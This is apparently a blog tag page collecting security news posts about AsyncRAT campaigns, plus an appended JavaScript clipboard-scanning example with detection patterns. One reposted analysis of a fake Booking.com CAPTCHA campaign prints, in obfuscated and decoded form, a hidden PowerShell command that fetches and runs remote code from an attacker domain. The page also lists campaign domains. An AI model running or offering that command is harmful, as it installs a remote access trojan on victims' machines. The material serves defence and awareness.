#AsyncRat
Text
Cyber Threats Q1 2024 revealed: Cat-Phishing, Living Off the Land, Fake Invoices

Cat-phishing, using a popular Microsoft file transfer tool to become a network parasite, and bogus invoicing were among the notable techniques cybercriminals deployed in Q1 2024, per @HP Wolf Security Report. https://tinyurl.com/mpjd96xp
#cybersecurity #threats #phishing #malware #infosec #cybercrime #hacking #emailsecurity #netsec #dataprotection #ransomware #antivirus #cyberthreats #phishingattacks #scams #catphishing #asyncrat #bits #filehijacking #redirectattacks #fakeinvoices #securityawareness #threatintelligence #emailgateways #browsersecurity #mobilemalware
0 notes
Text
Unmasking AsyncRAT New Infection Chain | McAfee Blog
Authored by Lakshya Mathur & Vignesh Dhatchanamoorthy AsyncRAT, short for “Asynchronous Remote Access Trojan,” is a sophisticated piece of malware designed to compromise the security of computer systems and steal sensitive information. What sets AsyncRAT apart from other malware strains is its stealthy nature, making it a formidable adversary in the world of cybersecurity. McAfee Labs has…
1 note
Text
Cybercriminals have started a campaign of redirecting links placed on gaming sites and social media—and as sponsored ads—that lead to fake websites posing as Booking.com. According to Malwarebytes research, 40% of people book travel through a general online search, creating a lot of opportunities for scammers. The first signs of the campaign showed up mid-May and the final redirect destination changes every two to three days. Following the links brings visitors to a familiar strategy where fake CAPTCHA websites hijack your clipboard and try to trick visitors into infecting their own device.
As usual on these websites, by putting a checkmark in the fake Captcha prompt you’re giving the website permission to copy something to your clipboard. Afterwards, the scammers involved will try to have the visitor execute a Run command on their computer. This type of prompt is never used in legitimate Captcha forms and should be immediately suspicious to all individuals.
[Image: instructions to infect your own device]

If you’re using Chrome, you may see this warning:

[Image: Chrome issues a warning, but the danger may be unclear to users]

The warning is nice, but it’s not very clear what this warning is for, in my opinion. Users of Malwarebytes’ Browser Guard will see this warning:

[Image: Malwarebytes Browser Guard’s clipboard warning]

“Hey, did you just copy something? Heads up, your clipboard was just accessed from this website. Be sure you trust the owner before passing this someplace you don’t want it. Like a terminal or an email to your boss.”

Well, either way, don’t just discard these warnings. Even if you think you’re looking at an actual booking website, this is not the kind of instructions you’re expected to follow. What the website just put on the clipboard may look like gobbledegook to some, though more experienced users will see the danger.

pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"

The cybercriminals used mixed casing, quote interruption, and variable name manipulation to hide their true intentions, but what it actually says (and does if you follow the instructions) is:

powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"

The malicious Captcha form tells the user to copy the content of the clipboard into the Windows Run dialog box and execute the instructions from the above command. When Browser Guard detects that the text copied to the clipboard contains this kind of potentially malicious command, it will add the phrase Suspicious Content at the front of the copied content, which makes it an invalid command, and the user will see a warning instead of having infected themselves.

Should a user fall for this without any protections enabled, the command will open a hidden PowerShell window to download and execute a file called ckjg.exe, which in turn would download and execute a file called Stub.exe, which is detected by Malwarebytes/ThreatDown as Backdoor.AsyncRAT. Backdoor.AsyncRAT is a backdoor Trojan which serves as a Remote Access Tool (RAT) designed to remotely monitor and control other computers.
In other words, it puts your device at the mercy of the person controlling the RAT. The criminals can gather sensitive and financial information from infected devices which can lead to financial damages and even identity theft.
IOCs

The domains and subdomains we found associated with this campaign rotate quickly. From what I could retrace, they change the URL to the landing page every two to three days. But here is a list of recently active ones.

(booking.)chargesguestescenter[.]com
(booking.)badgustrewivers.com[.]com
(booking.)property-paids[.]com
(booking.)rewiewqproperty[.]com
(booking.)extranet-listing[.]com
(booking.)guestsalerts[.]com
(booking.)gustescharge[.]com
kvhandelregis[.]com
patheer-moreinfo[.]com
guestalerthelp[.]com
rewiewwselect[.]com
hekpaharma[.]com
bkngnet[.]com
partnervrft[.]com

[Image: Malwarebytes blocks the download from bkngnet[.]com]

How to stay safe

There are a few things you can do to protect yourself from falling victim to these and similar methods:

Do not follow instructions provided by a website you visited without thinking it through.
Use an active anti-malware solution that blocks malicious websites and scripts.
Use a browser extension that blocks malicious domains and scams.
Disable JavaScript in your browser before visiting unknown websites. The clipboard access is triggered by a JavaScript function document.execCommand(‘copy’). Disabling JavaScript will stop that from happening, but it has the disadvantage that it will break many websites that you visit regularly.

What I do is use different browsers for different purposes.
3 notes
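The clipboard check the post above describes, as an added example that is not Browser Guard's or Malwarebytes' code: a small JavaScript normaliser that undoes the mixed casing and quote interruption shown in the post, then flags text that combines a script interpreter with download, execution or hidden-window markers, and prefixes it with "Suspicious Content" the way the post says Browser Guard does. It goes slightly beyond the single command in the post by matching a few related interpreter and download tokens. The sample clipboard strings and the malicious.example domain are constructed for this example; SUSPICIOUS_PATTERNS, normalizeClipboardText and inspectClipboardText are names chosen here, not an extension API.

```javascript
// Added example: a defender-side clipboard content check modelled on the
// behaviour the post attributes to Browser Guard. Not Malwarebytes' code.
// Runs under Node.js with no DOM; a browser extension would feed it the text
// it observes being written to the clipboard.

// Prefix that turns a flagged command into something the Run dialog rejects.
const SUSPICIOUS_PREFIX = "Suspicious Content ";

// Undo the cheap obfuscation tricks quoted in the post: quote interruption
// (pOwERsheLl -N"O"p"rO"), mixed casing, and typographic dashes.
function normalizeClipboardText(text) {
  return text
    .replace(/"/g, "")               // drop the interrupting double quotes
    .replace(/[\u2013\u2014]/g, "-") // en/em dash -> ASCII hyphen
    .replace(/\s+/g, " ")            // collapse whitespace
    .trim()
    .toLowerCase();
}

// Categories are matched against the normalised text. A hit in "interpreter"
// alone is not enough: ordinary prose mentions PowerShell all the time.
const SUSPICIOUS_PATTERNS = {
  interpreter: /\b(powershell|pwsh|mshta|wscript|cscript)(\.exe)?\b|\bcmd(\.exe)?\s+\/[ck]\b/,
  download: /\b(invoke-restmethod|invoke-webrequest|irm|iwr|curl|wget|downloadstring|downloadfile)\b|net\.webclient/,
  exec: /\b(invoke-expression|iex|start-process)\b/,
  hidden: /(^|\s)(-w(indowstyle)?\s+h(idden)?|\/w\s+h(idden)?)\b/,
};

// Returns the normalised text, which categories matched, whether the text is
// considered suspicious, and the text an extension should hand to the clipboard.
function inspectClipboardText(text) {
  const normalized = normalizeClipboardText(text);
  const categories = Object.keys(SUSPICIOUS_PATTERNS).filter((name) =>
    SUSPICIOUS_PATTERNS[name].test(normalized)
  );
  // Flag only an interpreter combined with at least one payload behaviour.
  const suspicious =
    categories.includes("interpreter") && categories.length >= 2;
  return {
    normalized,
    categories,
    suspicious,
    safeText: suspicious ? SUSPICIOUS_PREFIX + text : text,
  };
}

// Constructed sample inputs (the domain is a placeholder, not the post's IoC).
const SAMPLE_OBFUSCATED =
  `pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'mal"ic"ious.example';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"`;
const SAMPLE_BENIGN_URL = "https://www.booking.com/hotel/example?checkin=2024-05-01";
const SAMPLE_BENIGN_PROSE = "Please read the PowerShell docs before the meeting";

for (const sample of [SAMPLE_OBFUSCATED, SAMPLE_BENIGN_URL, SAMPLE_BENIGN_PROSE]) {
  const result = inspectClipboardText(sample);
  console.log(
    result.suspicious ? "FLAGGED" : "ok     ",
    result.categories.join(",") || "-",
    "|",
    result.normalized
  );
}
```

The two-category rule is the design choice worth noting: the normalised obfuscated sample trips all four categories, while a URL trips none and a sentence that merely mentions PowerShell trips only the interpreter category, so only the first is prefixed. Prefixing rather than blocking keeps the user's copy action intact while making the paste harmless, which is what the post describes.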
Text
AsyncRAT Campaign Uses Python Payloads and TryCloudflare Tunnels for Stealth Attacks
Source: https://thehackernews.com/2025/02/asyncrat-campaign-uses-python-payloads.html
More info: https://www.forcepoint.com/blog/x-labs/asyncrat-reloaded-python-trycloudflare-malware
3 notes
Text
Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets
A new malware campaign is exploiting a weakness in Discord’s invitation system to deliver an information stealer called Skuld and the AsyncRAT remote access trojan. “Attackers hijacked the links through vanity link registration, allowing them to silently redirect users from trusted sources to malicious servers,” Check Point said in a technical report. “The attackers combined the ClickFix phishing…

0 notes
Text
Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets
http://i.securitythinkingcap.com/TLLdlX
0 notes
Text
AsyncRAT: The silent threat that whispers from the shadows
In the dizzying world of advanced persistent threats (APT) and cybercrime, a stealthy shadow emerges, a digital predator lurking in the depths of the network: AsyncRAT. It is not a new actor on the scene, but its constant evolution and ubiquitous presence make it an unavoidable topic of analysis for any self-respecting information security professional. Do you think…
0 notes
Text
AsyncRAT emerges as a new threat as cybercriminals exploit legitimate platforms, according to Check Point Research
The latest Global Threat Index highlights that Androxgh0st has regained first place in Argentina and has affected 3.29% of companies. Check Point Research, the Threat Intelligence division of Check Point® Software Technologies Ltd. (NASDAQ: CHKP), a pioneer and global leader in cybersecurity solutions, publishes its Global Threat Index for February 2025, in which…
0 notes
Text
AsyncRAT campaign uses Python payloads and TryCloudflare tunnels for covert attacks
AsyncRAT campaign uses Python payloads and TryCloudflare tunnels for covert attacks: https://www.it-boltwise.de/asyncrat-kampagne-nutzt-python-payloads-und-trycloudflare-tunnel-fuer-verdeckte-angriffe.html
0 notes
Text
[YouTube video]
Summary
🔍 Purpose: Recorded Future's SecOps Dashboard streamlines incident analysis, integrating telemetry from tools like SIEMs, SOARs, and EDR systems for threat identification.
📊 Features:
Trending Malware Analysis: Identifies rising threats, such as AsyncRAT linked to phishing campaigns by nation-state actors.
Enrichment & Insights: Associates threats with MITRE patterns, TTPs, and actionable indicators for deeper context.
Historical Comparison: Offers a 30-day analysis of malware activity for anomaly detection.
Insights Based on Numbers
📈 Phishing Campaigns: Anomaly detection highlighted AsyncRAT spikes tied to a nation-state actor, TAG-66.
🔄 Integration Flexibility: Provides seamless connectivity to security tools, enhancing threat mitigation workflows.
0 notes
Text
SocGholish Malware Exploits BOINC Project for Covert Cyberattacks
The Hacker News: The JavaScript downloader malware known as SocGholish (aka FakeUpdates) is being used to deliver a remote access trojan called AsyncRAT as well as a legitimate open-source project called BOINC. BOINC, short for Berkeley Open Infrastructure Network Computing Client, is an open-source "volunteer computing" platform maintained by the University of California with an aim to carry out "large-scale http://dlvr.it/T9vhdW
Posted by: Mohit Kumar (Hacker)
0 notes
Photo

Stealthy AsyncRAT malware attacks targets US infrastructure for 11 months
0 notes
Text
Cybercriminals Abusing Cloudflare Tunnels to Evade Detection and Spread Malware

Source: https://thehackernews.com/2024/08/cybercriminals-abusing-cloudflare.html
More info:
https://www.esentire.com/blog/quartet-of-trouble-xworm-asyncrat-venomrat-and-purelogs-stealer-leverage-trycloudflare
https://www.proofpoint.com/us/blog/threat-insight/threat-actor-abuses-cloudflare-tunnels-deliver-rats
6 notes
Link
https://bit.ly/3qXad6I

🌐 Cybersecurity firm Bitdefender has conducted an extensive investigation into a targeted cyber attack against East-Asian infrastructure, uncovering the workings of a sophisticated, presumably custom malware dubbed as Logutil backdoor. This operation reportedly ran for over a year, aiming to compromise credentials and exfiltrate data. #Cybersecurity #Bitdefender #LogutilBackdoor

🕵️‍♀️ The operation, traced back to early 2022, leveraged multiple tools to achieve its nefarious ends, Logutil being the primary one. Notably, AsyncRat was used during the initial stages of infection. The investigation suggests that CobaltStrike was part of the attackers' arsenal too. The victim of this operation was a company operating in the Technology/IT Services industry in East Asia. #CyberAttack #AsyncRat #CobaltStrike

💾 Modern cybercrime syndicates are increasingly leveraging legitimate components to perpetrate their attacks. For instance, DLL hijacking and misuse of legitimate scheduled tasks and services are commonly employed tactics. Notably, state-affiliated actors such as the APT29 group have used this strategy effectively, substituting a binary responsible for updating Adobe Reader with a malicious component, thus achieving persistence. #CybercrimeTactics #APT29 #AdobeReader

📍 These stealthy tactics were evident in the recent incident as well. The perpetrators deployed malware in locations less likely to be suspected of hosting such threats and more likely to be excluded from the security systems' scrutiny. #MalwareDeployment #CybersecurityChallenge

🔐 In this attack, the actors demonstrated capabilities of collecting credentials from various applications including MobaXterm, mRemoteNG, KeePass, and even Chrome passwords and history. They also attempted data exfiltration from MySQL servers by accessing server process memory, and made attempts to dump LSASS memory. #DataExfiltration #CredentialTheft

🔁 The investigation also found that the attackers could infect other systems if an RDP session was established with the infected system, by placing malicious components in \tsclient\c\ subfolders if tsclient share was enabled. This highlights the extent of the attack's complexity and potential for propagation.
#Cybersecurity #Bitdefender #LogutilBackdoor #CyberAttack #AsyncRat #CobaltStrike #CybercrimeTactics #APT29 #AdobeReader #MalwareDeployment #CybersecurityChallenge #DataExfiltration #CredentialTheft #RDPsession #MalwarePropagation
2 notes